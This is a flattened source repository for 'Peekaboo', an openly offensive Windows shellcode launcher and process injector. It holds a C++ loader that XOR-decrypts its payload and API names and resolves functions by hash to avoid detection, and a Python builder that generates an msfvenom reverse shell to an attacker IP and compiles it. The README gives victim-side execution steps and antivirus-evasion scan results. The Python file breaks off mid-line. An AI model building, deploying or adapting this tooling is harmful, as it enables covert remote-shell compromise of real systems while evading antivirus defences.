├── .gitignore ├── README.md ├── meow.bin ├── peekaboo.cpp ├── peekaboo.py ├── peekaboo_inj.cpp ├── peekaboo_nt.cpp └── screenshots ├── 1.png ├── 10.png ├── 11.png ├── 12.png ├── 13.png ├── 14.png ├── 15.png ├── 16.png ├── 2.png ├── 2022-04-24_13-05.png ├── 2022-04-24_13-08.png ├── 2022-04-24_13-11.png ├── 2022-04-24_13-12.png ├── 2022-04-24_13-13.png ├── 2022-04-24_13-18.png ├── 2022-04-24_13-20.png ├── 2022-04-24_13-22.png ├── 2022-04-24_13-25.png ├── 2022-04-24_13-27.png ├── 2022-04-24_13-29.png ├── 3.png ├── 4.png ├── 5.png ├── 6.png ├── 7.png ├── 8.png ├── 9.png ├── antiscan.png └── websec.png /.gitignore: -------------------------------------------------------------------------------- 1 | hack.bin 2 | calc.bin 3 | *.dll 4 | peekaboo-enc.cpp 5 | *.exe 6 | peekaboo.exe 7 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Peekaboo 2 | 3 | Simple undetectable shellcode and code injector launcher example. Inspired by RTO malware development course. 4 | 5 | ## Main logic 6 | 7 | XOR encryption and decryption for functions call and main payload - `msfvenom` reverse shell as example. 8 | 9 | ## Usage 10 | ## 1. DLL 11 | ### on attacker machine 12 | 13 | check your IP: 14 | ```bash 15 | ip a 16 | ``` 17 | 18 | ![attacker machine IP](./screenshots/2022-04-24_13-05.png?raw=true) 19 | 20 | run python script with flags: 21 | ```bash 22 | python3 peekaboo.py -l 192.168.56.1 -p 4444 --build 1 23 | ``` 24 | 25 | ![run python script](./screenshots/2022-04-24_13-08.png?raw=true) 26 | 27 | ### then on victim machine (windows 10 x64): 28 | run on powershell or cmd promt: 29 | ```cmd 30 | rundll32 .\peekaboo.dll, lCiSdbvIAaeZLHFfkUhEcbOy 31 | ``` 32 | 33 | ![run on victim machine](./screenshots/2022-04-24_13-11.png?raw=true) 34 | 35 | ### check on attacker machine: 36 | check your netcat listener: 37 | 38 | ![check netcat listener](./screenshots/2022-04-24_13-12.png?raw=true) 39 | 40 | ![check IP address](./screenshots/2022-04-24_13-13.png?raw=true) 41 | 42 | ## 2.Injector 43 | ### on attacker machine: 44 | check attacker ip: 45 | ```bash 46 | ip a 47 | ``` 48 | 49 | ![check IP](./screenshots/2022-04-24_13-05.png?raw=true) 50 | 51 | run python script on linux (for example process `mspaint.exe`): 52 | ```bash 53 | python3 peekaboo.py -l 192.168.56.1 -p 4444 -e mspaint.exe --build 2 54 | ``` 55 | 56 | ![run python script](./screenshots/2022-04-24_13-18.png?raw=true) 57 | 58 | ### then on victim machine run (windows 10 x64): 59 | ```cmd 60 | .\peekaboo.exe 61 | ``` 62 | 63 | or click (if `-m windows` param) 64 | 65 | ![run on victim machine](./screenshots/2022-04-24_13-20.png?raw=true) 66 | 67 | ### check on attacker machine: 68 | check your netcat listener: 69 | 70 | ![check netcat listener](./screenshots/2022-04-24_13-22.png?raw=true) 71 | 72 | ## 3. NT API injector 73 | run python script on linux (for example process `mspaint.exe`): 74 | ```bash 75 | python3 peekaboo.py -l 192.168.56.1 -p 4444 -e mspaint.exe -m console --build 3 76 | ``` 77 | 78 | ![enc and compile nt](./screenshots/2022-04-24_13-25.png?raw=true) 79 | 80 | ### then on victim machine (windows 10 x64): 81 | ```cmd 82 | .\peekaboo.exe 83 | ``` 84 | 85 | ![run malware](./screenshots/2022-04-24_13-27.png?raw=true) 86 | 87 | ![run malware](./screenshots/2022-04-24_13-29.png?raw=true) 88 | 89 | ## Issues. 90 | Tested on: 91 | 1. Attacker machines: Kali linux 2020.1, Windows 10 x64 92 | 2. Victim machine: Windows 7 x64, Windows 10 x64 93 | 3. Payload: windows x64 reverse shell from msfvenom 94 | 4. AV Engines: Kaspersky, Windows Defender, Norton Antivirus Plus 95 | 96 | ## virus total result: 97 | 02 september 2021 98 | 99 | ![virustotal](./screenshots/11.png?raw=true) 100 | 101 | [https://www.virustotal.com/gui/file/c930b9aeab693d36c68e7bcf6353c7515b8fffc8f9a9233e49e90da49ab5d470/detection](https://www.virustotal.com/gui/file/c930b9aeab693d36c68e7bcf6353c7515b8fffc8f9a9233e49e90da49ab5d470/detection) 102 | 103 | 30 december 2021 (NT API injector) 104 | 105 | ![virtustotal 2](./screenshots/16.png?raw=true) 106 | 107 | [https://www.virustotal.com/gui/file/743f50e92c6ef48d6514e0ce2a255165f83afb1ae66deefd68dac50d80748e55/detection](https://www.virustotal.com/gui/file/743f50e92c6ef48d6514e0ce2a255165f83afb1ae66deefd68dac50d80748e55/detection) 108 | 109 | ## antiscan.me result: 110 | 111 | 11 january 2022 (NT API injector) 112 | 113 | ![antiscan](./screenshots/antiscan.png?raw=true) 114 | 115 | [https://antiscan.me/scan/new/result?id=rQVfQhoFYgH9](https://antiscan.me/scan/new/result?id=rQVfQhoFYgH9) 116 | 117 | ## websec.nl scanner result: 118 | 119 | 10 October 2024 120 | 121 | ![websec](./screenshots/websec.png?raw=true) 122 | 123 | [https://websec.net/scanner/result/a3583316-cb72-4894-bd22-48241ca79db9](https://websec.net/scanner/result/a3583316-cb72-4894-bd22-48241ca79db9) 124 | 125 | ## TODO 126 | - [x] Compile injector in Kali linux 127 | - [x] XOR + AES [aes branch](https://github.com/cocomelonc/peekaboo/tree/aes) 128 | - [x] Calling Windows API functions by hash names 129 | - [x] Find Kernel32 base via asm style 130 | - [x] One python builder 131 | - [ ] Anti-VM tricks 132 | - [ ] Persistence via Windows Registry run keys 133 | - [ ] Replace msfvenom shell to donut payload??? 134 | 135 | ## Attention 136 | This tool is a Proof of Concept and is for Educational Purposes Only!!! Author takes no responsibility of any damage you cause 137 | 138 | ## License 139 | [MIT](https://choosealicense.com/licenses/mit/) 140 | -------------------------------------------------------------------------------- /meow.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/peekaboo/c3a990c59bf16fb508f782b7df6780c59eccafc8/meow.bin -------------------------------------------------------------------------------- /peekaboo.cpp: -------------------------------------------------------------------------------- 1 | /* 2 | pekaboo.cpp - inspired by RTO malware development course implementation 3 | */ 4 | 5 | #include 6 | #include 7 | #include 8 | #include 9 | 10 | #define KERNEL32_HASH 0x00000000 11 | #define GETMODULEHANDLE_HASH 0x00000000 12 | #define GETPROCADDRESS_HASH 0x00000000 13 | 14 | // encrypted payload 15 | unsigned char my_payload[] = { }; 16 | 17 | // encrypted functions 18 | unsigned char s_va[] = { }; 19 | unsigned char s_vp[] = { }; 20 | unsigned char s_ct[] = { }; 21 | unsigned char s_wfso[] = { }; 22 | unsigned char s_rmm[] = { }; 23 | 24 | unsigned char s_k32[] = { }; 25 | 26 | unsigned int my_payload_len = sizeof(my_payload); 27 | unsigned int s_va_len = sizeof(s_va); 28 | unsigned int s_vp_len = sizeof(s_vp); 29 | unsigned int s_ct_len = sizeof(s_ct); 30 | unsigned int s_wfso_len = sizeof(s_wfso); 31 | unsigned int s_rmm_len = sizeof(s_rmm); 32 | unsigned int s_k32_len = sizeof(s_k32); 33 | 34 | // keys 35 | char my_payload_key[] = ""; 36 | char s_va_key[] = ""; 37 | char s_vp_key[] = ""; 38 | char s_ct_key[] = ""; 39 | char s_wfso_key[] = ""; 40 | char s_rmm_key[] = ""; 41 | char s_k32_key[] = ""; 42 | 43 | typedef struct _UNICODE_STRING { 44 | USHORT Length; 45 | USHORT MaximumLength; 46 | PWSTR Buffer; 47 | } UNICODE_STRING; 48 | 49 | struct LDR_MODULE { 50 | LIST_ENTRY e[3]; 51 | HMODULE base; 52 | void* entry; 53 | UINT size; 54 | UNICODE_STRING dllPath; 55 | UNICODE_STRING dllname; 56 | }; 57 | 58 | // LPVOID (WINAPI * ppVirtualAlloc)(LPVOID lpAddress, SIZE_T dwSize, DWORD flAllocationType, DWORD flProtect); 59 | 60 | typedef PVOID (WINAPI *pVirtualAlloc)( 61 | LPVOID lpAddress, 62 | SIZE_T dwSize, 63 | DWORD flAllocationType, 64 | DWORD flProtect 65 | ); 66 | 67 | 68 | typedef BOOL (WINAPI * pVirtualProtect)( 69 | LPVOID lpAddress, 70 | SIZE_T dwSize, 71 | DWORD flNewProtect, 72 | PDWORD lpflOldProtect 73 | ); 74 | 75 | typedef HANDLE (WINAPI * pCreateThread)( 76 | LPSECURITY_ATTRIBUTES lpThreadAttributes, 77 | SIZE_T dwStackSize, 78 | LPTHREAD_START_ROUTINE lpStartAddress, 79 | __drv_aliasesMem LPVOID lpParameter, 80 | DWORD dwCreationFlags, 81 | LPDWORD lpThreadId 82 | ); 83 | 84 | typedef DWORD (WINAPI * pWaitForSingleObject)( 85 | HANDLE hHandle, 86 | DWORD dwMilliseconds 87 | ); 88 | 89 | typedef VOID (WINAPI * pRtlMoveMemory)( 90 | _Out_ VOID UNALIGNED *Destination, 91 | _In_ const VOID UNALIGNED *Source, 92 | _In_ SIZE_T Length 93 | ); 94 | 95 | typedef HMODULE (WINAPI *pGetModuleHandleA)( 96 | LPCSTR lpModuleName 97 | ); 98 | 99 | typedef FARPROC (WINAPI *pGetProcAddress)( 100 | HMODULE hModule, 101 | LPCSTR lpProcName 102 | ); 103 | 104 | void XOR(char * data, size_t data_len, char * key, size_t key_len) { 105 | int j; 106 | 107 | j = 0; 108 | for (int i = 0; i < data_len; i++) { 109 | if (j == key_len - 1) j = 0; 110 | data[i] = data[i] ^ key[j]; 111 | j++; 112 | } 113 | } 114 | 115 | DWORD calcMyHash(char* data) { 116 | DWORD hash = 0x35; 117 | for (int i = 0; i < strlen(data); i++) { 118 | hash += data[i] + (hash << 1); 119 | } 120 | return hash; 121 | } 122 | 123 | static DWORD calcMyHashBase(LDR_MODULE* mdll) { 124 | char name[64]; 125 | size_t i = 0; 126 | 127 | while (mdll->dllname.Buffer[i] && i < sizeof(name) - 1) { 128 | name[i] = (char)mdll->dllname.Buffer[i]; 129 | i++; 130 | } 131 | name[i] = 0; 132 | return calcMyHash((char *)CharLowerA(name)); 133 | } 134 | 135 | static HMODULE getKernel32(DWORD myHash) { 136 | HMODULE kernel32; 137 | INT_PTR peb = __readgsqword(0x60); 138 | auto modList = 0x18; 139 | auto modListFlink = 0x18; 140 | auto kernelBaseAddr = 0x10; 141 | 142 | auto mdllist = *(INT_PTR*)(peb + modList); 143 | auto mlink = *(INT_PTR*)(mdllist + modListFlink); 144 | auto krnbase = *(INT_PTR*)(mlink + kernelBaseAddr); 145 | auto mdl = (LDR_MODULE*)mlink; 146 | do { 147 | mdl = (LDR_MODULE*)mdl->e[0].Flink; 148 | if (mdl->base != nullptr) { 149 | if (calcMyHashBase(mdl) == myHash) { // kernel32.dll hash 150 | break; 151 | } 152 | } 153 | } while (mlink != (INT_PTR)mdl); 154 | 155 | kernel32 = (HMODULE)mdl->base; 156 | return kernel32; 157 | } 158 | 159 | static LPVOID getAPIAddr(HMODULE h, DWORD myHash) { 160 | PIMAGE_DOS_HEADER img_dos_header = (PIMAGE_DOS_HEADER)h; 161 | PIMAGE_NT_HEADERS img_nt_header = (PIMAGE_NT_HEADERS)((LPBYTE)h + img_dos_header->e_lfanew); 162 | PIMAGE_EXPORT_DIRECTORY img_edt = (PIMAGE_EXPORT_DIRECTORY)( 163 | (LPBYTE)h + img_nt_header->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress); 164 | PDWORD fAddr = (PDWORD)((LPBYTE)h + img_edt->AddressOfFunctions); 165 | PDWORD fNames = (PDWORD)((LPBYTE)h + img_edt->AddressOfNames); 166 | PWORD fOrd = (PWORD)((LPBYTE)h + img_edt->AddressOfNameOrdinals); 167 | 168 | for (DWORD i = 0; i < img_edt->AddressOfFunctions; i++) { 169 | LPSTR pFuncName = (LPSTR)((LPBYTE)h + fNames[i]); 170 | 171 | if (calcMyHash(pFuncName) == myHash) { 172 | // printf("successfully found! %s - %d\n", pFuncName, myHash); 173 | return (LPVOID)((LPBYTE)h + fAddr[fOrd[i]]); 174 | } 175 | } 176 | return nullptr; 177 | } 178 | 179 | BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved) { 180 | switch (ul_reason_for_call) { 181 | case DLL_PROCESS_ATTACH: 182 | case DLL_PROCESS_DETACH: 183 | case DLL_THREAD_ATTACH: 184 | case DLL_THREAD_DETACH: 185 | break; 186 | } 187 | return TRUE; 188 | } 189 | 190 | extern "C" { 191 | __declspec(dllexport) BOOL WINAPI RunRCE(void) { 192 | void * exec_mem; 193 | BOOL rv; 194 | HANDLE th; 195 | DWORD oldprotect = 0; 196 | 197 | HMODULE mod = getKernel32(KERNEL32_HASH); 198 | pGetModuleHandleA myGetModuleHandleA = (pGetModuleHandleA)getAPIAddr(mod, GETMODULEHANDLE_HASH); 199 | pGetProcAddress myGetProcAddress = (pGetProcAddress)getAPIAddr(mod, GETPROCADDRESS_HASH); 200 | 201 | // decrypt dll name 202 | XOR((char *) s_k32, s_k32_len, s_k32_key, sizeof(s_k32_key)); 203 | HMODULE hk32 = myGetModuleHandleA(s_k32); 204 | 205 | // decrypt VirtualAlloc 206 | XOR((char *) s_va, s_va_len, s_va_key, sizeof(s_va_key)); 207 | pVirtualAlloc myVirtualAlloc = (pVirtualAlloc)myGetProcAddress(hk32, s_va); 208 | 209 | // allocate memory for payload 210 | exec_mem = myVirtualAlloc(0, my_payload_len, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE); 211 | 212 | // decrypt payload 213 | XOR((char *) my_payload, my_payload_len, my_payload_key, sizeof(my_payload_key)); 214 | 215 | // copy payload to allocated buffer 216 | XOR((char *) s_rmm, s_rmm_len, s_rmm_key, sizeof(s_rmm_key)); 217 | pRtlMoveMemory myRtlMoveMemory = (pRtlMoveMemory)myGetProcAddress(hk32, s_rmm); 218 | myRtlMoveMemory(exec_mem, my_payload, my_payload_len); 219 | 220 | // decrypt VirtualProtect 221 | XOR((char *) s_vp, s_vp_len, s_vp_key, sizeof(s_vp_key)); 222 | pVirtualProtect myVirtualProtect = (pVirtualProtect)myGetProcAddress(hk32, s_vp); 223 | rv = myVirtualProtect(exec_mem, my_payload_len, PAGE_EXECUTE_READ, &oldprotect); 224 | 225 | // if all good, launch the payload 226 | if ( rv != 0 ) { 227 | 228 | // decrypt CreateThread 229 | XOR((char *) s_ct, s_ct_len, s_ct_key, sizeof(s_ct_key)); 230 | pCreateThread myCreateThread = (pCreateThread)myGetProcAddress(hk32, s_ct); 231 | th = myCreateThread(0, 0, (LPTHREAD_START_ROUTINE) exec_mem, 0, 0, 0); 232 | 233 | // decrypt WaitForSingleObject 234 | XOR((char *) s_wfso, s_wfso_len, s_wfso_key, sizeof(s_wfso_key)); 235 | pWaitForSingleObject myWaitForSingleObject = (pWaitForSingleObject)myGetProcAddress(hk32, s_wfso); 236 | myWaitForSingleObject(th, -1); 237 | } 238 | return TRUE; 239 | } 240 | } 241 | -------------------------------------------------------------------------------- /peekaboo.py: -------------------------------------------------------------------------------- 1 | # payload encryption functions 2 | import argparse 3 | import subprocess 4 | import sys 5 | import random 6 | import os 7 | import hashlib 8 | import string 9 | 10 | class Colors: 11 | HEADER = '\033[95m' 12 | BLUE = '\033[94m' 13 | GREEN = '\033[92m' 14 | YELLOW = '\033[93m' 15 | RED = '\033[91m' 16 | PURPLE = '\033[95m' 17 | ENDC = '\033[0m' 18 | BOLD = '\033[1m' 19 | UNDERLINE = '\033[4m' 20 | 21 | class PeekabooEncryptor(): 22 | def __init__(self): 23 | self.XOR_PAYLOAD = self.random() 24 | self.XOR_FUNC = self.random() 25 | self.XOR_PROC = self.random() 26 | self.XOR_DLL = self.random() 27 | 28 | def payload_key(self): 29 | return self.XOR_PAYLOAD 30 | 31 | def func_key(self): 32 | return self.XOR_FUNC 33 | 34 | def proc_key(self): 35 | return self.XOR_PROC 36 | 37 | def dll_key(self): 38 | return self.XOR_DLL 39 | 40 | def xor(self, data, key): 41 | key = str(key) 42 | l = len(key) 43 | output_str = "" 44 | 45 | for i in range(len(data)): 46 | current = data[i] 47 | current_key = key[i % len(key)] 48 | ordd = lambda x: x if isinstance(x, int) else ord(x) 49 | output_str += chr(ordd(current) ^ ord(current_key)) 50 | 51 | return output_str 52 | 53 | def xor_encrypt(self, data, key): 54 | ciphertext = self.xor(data, key) 55 | ciphertext = '{ 0x' + ', 0x'.join(hex(ord(x))[2:] for x in ciphertext) + ' };' 56 | return ciphertext, key 57 | 58 | def random(self): 59 | length = random.randint(16, 32) 60 | return ''.join(random.choice(string.ascii_letters) for i in range(length)) 61 | 62 | class PeekabooHasher(): 63 | def hashing(self, data): 64 | hash = 0x35 65 | for i in range(0, len(data)): 66 | hash += ord(data[i]) + (hash << 1) 67 | return hash 68 | 69 | def generate_payload(host, port): 70 | print (Colors.BLUE + "generate reverse shell payload..." + Colors.ENDC) 71 | msfv = "msfvenom -p windows/x64/shell_reverse_tcp" 72 | msfv += " LHOST=" + host 73 | msfv += " LPORT=" + port 74 | msfv += " -f raw" 75 | msfv += " -o /tmp/hack.bin" 76 | print (Colors.YELLOW + msfv + Colors.ENDC) 77 | try: 78 | p = subprocess.Popen(msfv.split(), stdout = subprocess.PIPE) 79 | p.wait() 80 | print (Colors.GREEN + "reverse shell payload successfully generated :)" + Colors.ENDC) 81 | except Exception as e: 82 | print (Colors.RED + "generate payload failed :(" + Colors.ENDC) 83 | sys.exit() 84 | 85 | def run_peekaboo(host, port, build, proc_name, mode): 86 | banner = """ 87 | ##### ###### # # ## ##### #### #### 88 | # # # # # # # # # # # # # 89 | # # ##### #### ##### # # ##### ##### # # # # 90 | ##### # # # ###### # # # # # # 91 | # # # # # # # # # # # # 92 | # ###### # # # # ##### #### #### 93 | by @cocomelonc, many thanks to: 94 | https://institute.sektor7.net/red-team-operator-malware-development-essentials 95 | """ 96 | print (Colors.BLUE + banner + Colors.ENDC) 97 | generate_payload(host, port) 98 | encryptor = PeekabooEncryptor() 99 | hasher = PeekabooHasher() 100 | print (Colors.BLUE + "read payload..." + Colors.ENDC) 101 | plaintext = open("/tmp/hack.bin", "rb").read() 102 | # plaintext = open("./meow.bin", "rb").read() 103 | 104 | print (Colors.BLUE + "build " + build + "..." + Colors.ENDC) 105 | if build == '1': 106 | f_va = "VirtualAlloc" 107 | f_vp = "VirtualProtect" 108 | f_cth = "CreateThread" 109 | f_wfso = "WaitForSingleObject" 110 | f_rmm = "RtlMoveMemory" 111 | f_rce = "RunRCE" 112 | f_xor = "XOR" 113 | 114 | print (Colors.BLUE + "encrypt..." + Colors.ENDC) 115 | f_rce, f_xor = encryptor.random(), encryptor.random() 116 | ciphertext, p_key = encryptor.xor_encrypt(plaintext, encryptor.payload_key()) 117 | ciphertext_va, va_key = encryptor.xor_encrypt(f_va, encryptor.func_key()) 118 | ciphertext_vp, vp_key = encryptor.xor_encrypt(f_vp, encryptor.func_key()) 119 | ciphertext_cth, ct_key = encryptor.xor_encrypt(f_cth, encryptor.func_key()) 120 | ciphertext_wfso, wfso_key = encryptor.xor_encrypt(f_wfso, encryptor.func_key()) 121 | ciphertext_rmm, rmm_key = encryptor.xor_encrypt(f_rmm, encryptor.func_key()) 122 | 123 | kernel32_hash = hasher.hashing("kernel32.dll") 124 | getmodulehandle_hash = hasher.hashing("GetModuleHandleA") 125 | getprocaddress_hash = hasher.hashing("GetProcAddress") 126 | 127 | tmp = open("peekaboo.cpp", "rt") 128 | data = tmp.read() 129 | 130 | data = data.replace('unsigned char my_payload[] = { };', 'unsigned char my_payload[] = ' + ciphertext) 131 | data = data.replace('unsigned char s_va[] = { };', 'unsigned char s_va[] = ' + ciphertext_va) 132 | data = data.replace('unsigned char s_vp[] = { };', 'unsigned char s_vp[] = ' + ciphertext_vp) 133 | data = data.replace('unsigned char s_ct[] = { };', 'unsigned char s_ct[] = ' + ciphertext_cth) 134 | data = data.replace('unsigned char s_wfso[] = { };', 'unsigned char s_wfso[] = ' + ciphertext_wfso) 135 | data = data.replace('unsigned char s_rmm[] = { };', 'unsigned char s_rmm[] = ' + ciphertext_rmm) 136 | 137 | data = data.replace('char my_payload_key[] = "";', 'char my_payload_key[] = "' + p_key + '";') 138 | 139 | data = data.replace('char s_va_key[] = "";', 'char s_va_key[] = "' + va_key + '";') 140 | data = data.replace('char s_vp_key[] = "";', 'char s_vp_key[] = "' + vp_key + '";') 141 | data = data.replace('char s_ct_key[] = "";', 'char s_ct_key[] = "' + ct_key + '";') 142 | data = data.replace('char s_wfso_key[] = "";', 'char s_wfso_key[] = "' + wfso_key + '";') 143 | data = data.replace('char s_rmm_key[] = "";', 'char s_rmm_key[] = "' + rmm_key + '";') 144 | 145 | data = data.replace('RunRCE', f_rce) 146 | data = data.replace('XOR', f_xor) 147 | 148 | print (Colors.BLUE + "calculating win API hashes..." + Colors.ENDC) 149 | data = data.replace('#define KERNEL32_HASH 0x00000000', '#define KERNEL32_HASH ' + str(kernel32_hash)) 150 | data = data.replace('#define GETMODULEHANDLE_HASH 0x00000000', '#define GETMODULEHANDLE_HASH ' + str(getmodulehandle_hash)) 151 | data = data.replace('#define GETPROCADDRESS_HASH 0x00000000', '#define GETPROCADDRESS_HASH ' + str(getprocaddress_hash)) 152 | 153 | tmp.close() 154 | tmp = open("peekaboo-enc.cpp", "w+") 155 | tmp.write(data) 156 | tmp.close() 157 | 158 | print (Colors.GREEN + "successfully encrypt template file :)" + Colors.ENDC) 159 | 160 | print (Colors.BLUE + "compiling..." + Colors.ENDC) 161 | try: 162 | cmd = "x86_64-w64-mingw32-g++ -shared -o peekaboo.dll peekaboo-enc.cpp -fpermissive >/dev/null 2>&1" 163 | os.system(cmd) 164 | os.remove("peekaboo-enc.cpp") 165 | except: 166 | print (Colors.RED + "error compiling template :(" + Colors.ENDC) 167 | sys.exit() 168 | else: 169 | print (Colors.YELLOW + cmd + Colors.ENDC) 170 | print (Colors.GREEN + "successfully compiled :)" + Colors.ENDC) 171 | print (Colors.GREEN + "rundll32 .\peekaboo.dll, " + f_rce) 172 | 173 | elif build == '2': 174 | f_vaex = "VirtualAllocEx" 175 | f_op = "OpenProcess" 176 | f_cth = "CreateRemoteThread" 177 | f_wfso = "WaitForSingleObject" 178 | f_wpm = "WriteProcessMemory" 179 | f_clh = "CloseHandle" 180 | f_p32f = "Process32First" 181 | f_p32n = "Process32Next" 182 | f_ct32s = "CreateToolhelp32Snapshot" 183 | 184 | f_xor = "XOR" 185 | f_inj = "pekabooo" 186 | f_ftt = "findMyProc" 187 | 188 | k32_name = "kernel32" 189 | 190 | print (Colors.BLUE + "process name: " + proc_name + "..." + Colors.ENDC) 191 | print (Colors.BLUE + "encrypt..." + Colors.ENDC) 192 | f_xor, f_inj, f_ftt = encryptor.random(), encryptor.random(), encryptor.random() 193 | ciphertext, p_key = encryptor.xor_encrypt(plaintext, encryptor.payload_key()) 194 | ciphertext_vaex, vaex_key = encryptor.xor_encrypt(f_vaex, encryptor.func_key()) 195 | ciphertext_wpm, wpm_key = encryptor.xor_encrypt(f_wpm, encryptor.func_key()) 196 | ciphertext_cth, ct_key = encryptor.xor_encrypt(f_cth, encryptor.func_key()) 197 | ciphertext_wfso, wfso_key = encryptor.xor_encrypt(f_wfso, encryptor.func_key()) 198 | ciphertext_clh, clh_key = encryptor.xor_encrypt(f_clh, encryptor.func_key()) 199 | ciphertext_p32f, p32f_key = encryptor.xor_encrypt(f_p32f, encryptor.func_key()) 200 | ciphertext_p32n, p32n_key = encryptor.xor_encrypt(f_p32n, encryptor.func_key()) 201 | ciphertext_op, op_key = encryptor.xor_encrypt(f_op, encryptor.func_key()) 202 | ciphertext_ct32s, ct32s_key = encryptor.xor_encrypt(f_ct32s, encryptor.func_key()) 203 | ciphertext_proc, proc_key = encryptor.xor_encrypt(proc_name, encryptor.proc_key()) 204 | ciphertext_k32, k32_key = encryptor.xor_encrypt(k32_name, encryptor.dll_key()) 205 | 206 | kernel32_hash = hasher.hashing("kernel32.dll") 207 | getmodulehandle_hash = hasher.hashing("GetModuleHandleA") 208 | getprocaddress_hash = hasher.hashing("GetProcAddress") 209 | 210 | tmp = open("peekaboo_inj.cpp", "rt") 211 | data = tmp.read() 212 | 213 | data = data.replace('unsigned char my_payload[] = { };', 'unsigned char my_payload[] = ' + ciphertext) 214 | data = data.replace('unsigned char s_vaex[] = { };', 'unsigned char s_vaex[] = ' + ciphertext_vaex) 215 | data = data.replace('unsigned char s_cth[] = { };', 'unsigned char s_cth[] = ' + ciphertext_cth) 216 | data = data.replace('unsigned char s_wfso[] = { };', 'unsigned char s_wfso[] = ' + ciphertext_wfso) 217 | data = data.replace('unsigned char s_wpm[] = { };', 'unsigned char s_wpm[] = ' + ciphertext_wpm) 218 | data = data.replace('unsigned char s_op[] = { };', 'unsigned char s_op[] = ' + ciphertext_op) 219 | data = data.replace('unsigned char s_clh[] = { };', 'unsigned char s_clh[] = ' + ciphertext_clh) 220 | data = data.replace('unsigned char s_p32f[] = { };', 'unsigned char s_p32f[] = ' + ciphertext_p32f) 221 | data = data.replace('unsigned char s_p32n[] = { };', 'unsigned char s_p32n[] = ' + ciphertext_p32n) 222 | data = data.replace('unsigned char s_ct32s[] = { };', 'unsigned char s_ct32s[] = ' + ciphertext_ct32s) 223 | data = data.replace('unsigned char my_proc[] = { };', 'unsigned char my_proc[] = ' + ciphertext_proc) 224 | data = data.replace('unsigned char s_k32[] = { };', 'unsigned char s_k32[] = ' + ciphertext_k32) 225 | 226 | data = data.replace('char my_payload_key[] = "";', 'char my_payload_key[] = "' + p_key + '";') 227 | data = data.replace('char my_proc_key[] = "";', 'char my_proc_key[] = "' + proc_key + '";') 228 | data = data.replace('char s_vaex_key[] = "";', 'char s_vaex_key[] = "' + vaex_key + '";') 229 | data = data.replace('char s_wpm_key[] = "";', 'char s_wpm_key[] = "' + wpm_key + '";') 230 | data = data.replace('char s_cth_key[] = "";', 'char s_cth_key[] = "' + ct_key + '";') 231 | data = data.replace('char s_wfso_key[] = "";', 'char s_wfso_key[] = "' + wfso_key + '";') 232 | data = data.replace('char s_clh_key[] = "";', 'char s_clh_key[] = "' + clh_key + '";') 233 | data = data.replace('char s_p32f_key[] = "";', 'char s_p32f_key[] = "' + p32f_key + '";') 234 | data = data.replace('char s_p32n_key[] = "";', 'char s_p32n_key[] = "' + p32n_key + '";') 235 | data = data.replace('char s_op_key[] = "";', 'char s_op_key[] = "' + op_key + '";') 236 | data = data.replace('char s_ct32s_key[] = "";', 'char s_ct32s_key[] = "' + ct32s_key + '";') 237 | data = data.replace('char k32_key[] = "";', 'char k32_key[] = "' + k32_key + '";') 238 | data = data.replace('XOR(', f_xor + "(") 239 | data = data.replace("pekabooo(", f_inj + "(") 240 | data = data.replace("findMyProc(", f_ftt + "(") 241 | 242 | print (Colors.BLUE + "calculating win API hashes..." + Colors.ENDC) 243 | data = data.replace('#define KERNEL32_HASH 0x00000000', '#define KERNEL32_HASH ' + str(kernel32_hash)) 244 | data = data.replace('#define GETMODULEHANDLE_HASH 0x00000000', '#define GETMODULEHANDLE_HASH ' + str(getmodulehandle_hash)) 245 | data = data.replace('#define GETPROCADDRESS_HASH 0x00000000', '#define GETPROCADDRESS_HASH ' + str(getprocaddress_hash)) 246 | 247 | if mode == "console": 248 | data = data.replace("int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow) {", "int main(void) {") 249 | 250 | tmp.close() 251 | tmp = open("peekaboo-enc.cpp", "w+") 252 | tmp.write(data) 253 | tmp.close() 254 | 255 | print (Colors.GREEN + "successfully encrypt template file :)" + Colors.ENDC) 256 | 257 | print (Colors.BLUE + "compiling..." + Colors.ENDC) 258 | try: 259 | cmd = "x86_64-w64-mingw32-gcc -O2 peekaboo-enc.cpp -o peekaboo.exe -m" + mode + " -I/usr/share/mingw-w64/include/ -s -ffunction-sections -fdata-sections -Wno-write-strings -fno-exceptions -fmerge-all-constants -static-libstdc++ -static-libgcc -fpermissive >/dev/null 2>&1" 260 | os.system(cmd) 261 | os.remove("peekaboo-enc.cpp") 262 | except: 263 | print (Colors.RED + "error compiling template :(" + Colors.ENDC) 264 | sys.exit() 265 | else: 266 | print (Colors.YELLOW + cmd + Colors.ENDC) 267 | print (Colors.GREEN + "successfully compiled :)" + Colors.ENDC) 268 | 269 | elif build == '3': 270 | f_ntop = "NtOpenProcess" 271 | f_ntcs = "NtCreateSection" 272 | f_ntmvos = "NtMapViewOfSection" 273 | f_wfso = "WaitForSingleObject" 274 | f_rcut = "RtlCreateUserThread" 275 | f_clh = "CloseHandle" 276 | f_p32f = "Process32First" 277 | f_p32n = "Process32Next" 278 | f_ct32s = "CreateToolhelp32Snapshot" 279 | f_zw = "ZwUnmapViewOfSection" 280 | 281 | f_xor = "XOR(" 282 | f_ftt = "findMyProc" 283 | 284 | k32_name = "kernel32" 285 | ntdll_name = "ntdll" 286 | 287 | print (Colors.BLUE + "process name: " + proc_name + "..." + Colors.ENDC) 288 | print (Colors.BLUE + "encrypt..." + Colors.ENDC) 289 | f_xor, f_ftt = encryptor.random(), encryptor.random() 290 | ciphertext, p_key = encryptor.xor_encrypt(plaintext, encryptor.payload_key()) 291 | ciphertext_ntop, ntop_key = encryptor.xor_encrypt(f_ntop, encryptor.func_key()) 292 | ciphertext_ntcs, ntcs_key = encryptor.xor_encrypt(f_ntcs, encryptor.func_key()) 293 | ciphertext_ntmvos, ntmvos_key = encryptor.xor_encrypt(f_ntmvos, encryptor.func_key()) 294 | ciphertext_rcut, rcut_key = encryptor.xor_encrypt(f_rcut, encryptor.func_key()) 295 | ciphertext_wfso, wfso_key = encryptor.xor_encrypt(f_wfso, encryptor.func_key()) 296 | ciphertext_clh, clh_key = encryptor.xor_encrypt(f_clh, encryptor.func_key()) 297 | ciphertext_p32f, p32f_key = 